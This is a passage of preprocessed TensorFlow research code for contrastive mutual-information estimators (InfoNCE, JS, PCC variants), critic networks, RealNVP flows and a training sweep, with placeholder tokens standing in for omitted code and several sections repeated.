https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, 